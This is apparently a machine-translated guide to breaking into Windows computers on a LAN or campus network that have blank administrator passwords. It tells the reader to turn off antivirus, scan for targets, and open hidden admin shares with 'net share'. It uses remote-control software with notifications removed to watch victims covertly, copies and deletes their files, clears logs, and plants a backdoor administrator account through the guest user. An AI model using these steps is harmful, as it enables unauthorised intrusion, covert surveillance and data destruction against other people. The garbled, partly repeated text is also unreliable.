Whole Process of LAN Detection

Generally, you need to use three: NTscan abnormal scanner, Recton -- D he/she special edition, and DameWare Mini Chinese version 4.5. (Anti-Virus Software of the first two tools will report viruses. We recommend that you temporarily disable anti-virus software in real time and encrypt the compressed packages of the two software to prevent viruses from being killed .) ...
1. The intrusion scope only covers the lan. If you are in a school, You can intrude into the entire campus network;
2. Only weak passwords (username: administrator, password blank) exist, and port 139 is enabled, but no firewall sub-host is enabled.
Intrusion tool:
Generally, you need to use three: NTscan abnormal scanner, Recton -- D he/she special edition, and DameWare Mini Chinese version 4.5. (Anti-Virus Software of the first two tools will report viruses. We recommend that you temporarily disable anti-virus software in real time and encrypt the compressed packages of the two software to prevent viruses from being killed .)
Intrusion steps:
1. Use the "NTscan abnormal scanner", fill in the IP address range to be scanned, select the "WMI scan" method, and press "start" to wait for the scan results.
2. Use the "Recton -- D Special Edition"
Select the "CMD command" and enter "net share C $ = C:" in "CMD:" To enable disk C sharing for the remote host and change "C" to "D, e, F, etc. You can enable sharing of D, E, and F disks. This sharing method is highly concealed and completely shared, the shared disk icon is not displayed on the target host. Then, enter "\ IPC $" in the address bar to enter the target host C.
Select "Telnet" and enter the IP address you just scanned in "remote host" to start the Telnet service remotely. Then, in "CMD options", run the following command: "net share ipc $", run: "net share admin $", and finally run "net use \***. ***. ***. * ** IPC $ "/user: administrator" fill in the IP address of the host you invaded in.
3. use "DameWare Mini Chinese version 4.5", click "DameWare Mini Remote Control" after installation, select activate product in "help", and enter registration information. After successful registration, enter the "remote connection" window, enter the IP address in "host", click "set", and click "edit" in "service installation options, in the "Notification dialog box", remove "connection notification". In "Additional Settings", all are not selected. In "user options", remove "Enable user options ". After the settings are complete, click "Connect". In the displayed dialog box, click "OK". After the settings are complete, you can control others' computers as you operate your own computers, of course, you can only monitor the screen of the recipient. Note: If you do not register, a dialog box will pop up on the host to expose your identity.
Addition of intrusion steps:
1. in step 4 above, to remotely start the Telnet service, choose "my computer-Manage-connect to another computer-enter IP-service and application-service-change telnet to manual-start.
2. recton-D has other functions. In the process item, you can view the process of the remote host and terminate the process at will. In the sharing item, share can be created. I usually create C $, D $, E $, F $, and the share path corresponds to C:, D:, etc, after sharing, enter \ IPC $ in the address bar and enter the drive C of the other party. You can copy and delete the content at will, and the share icon is not displayed on the drive letter of the other party, it will not be discovered. It is best to turn off sharing after completing the process. Finally, select "log" to clear all logs without any trace. This software will be killed as a virus by anti-virus software, and the real-time anti-virus should be disabled when using it.
3. the above sharing can be completed through CMD (Program-attachment-command prompt), First "telnet IP", telnet up, Type y, then enter the user name "administrator", the password is blank, after entering, open the share with net share command, share C $ (that is, drive C): "net share C $ = c:", share the system Folder: "net share c = C: winntsystem32 ", shared IPC $:" net share IPC $ ", and so on. Finally, disable sharing, and disable drive C sharing:" net share C $/del ".
4. To facilitate next intrusion, you can set a backdoor to view the user: "net user" and activate the guest user.
"Net user guest/active: yes", change the password of guest to poco: "net user guest poco", and escalate the permission of guest to administrator: "net localgroup administrators guest/add ".
5. there are many telnet commands (doscommands). You can find the commands on the Internet. Commonly Used Commands include: view the d Drive file: "" dir d: ", view the c drive program file folder:" dir c: PROGRA ~ 1; ", shutdown in 60 seconds countdown:" shutdown-s-t 60"
Note:
1. net use error causes:
(1). "system error 1326 occurs. Logon Failed: Unknown user name or wrong password. "
In the remote machine's "Control Panel-Folder Options-View-simple file sharing", remove the selection, and then try to connect. Simple file sharing classifies all network connection permissions as guest connections, and cannot access management shares such as C $.
(2) "system error 1327 occurs. Logon Failed: User Account restriction. Possible causes include not allow blank passwords, logon time limits, or mandatory policy limits. "In" Control Panel-Administrative Tools-Local Security Policy-Security Options-User Permissions "assignment of remote machines, disable" Empty Password users can only log on to the console ".
(3) The system prompts "// IP/c $" that the network path cannot be found. In "network and dial-up connections", "local connections", select "Internet Protocol (TCP/IP, go to "Advanced TCP/IP Settings" and select "WINS Settings". There is an entry in "enable TCP/IP NETBIOS ".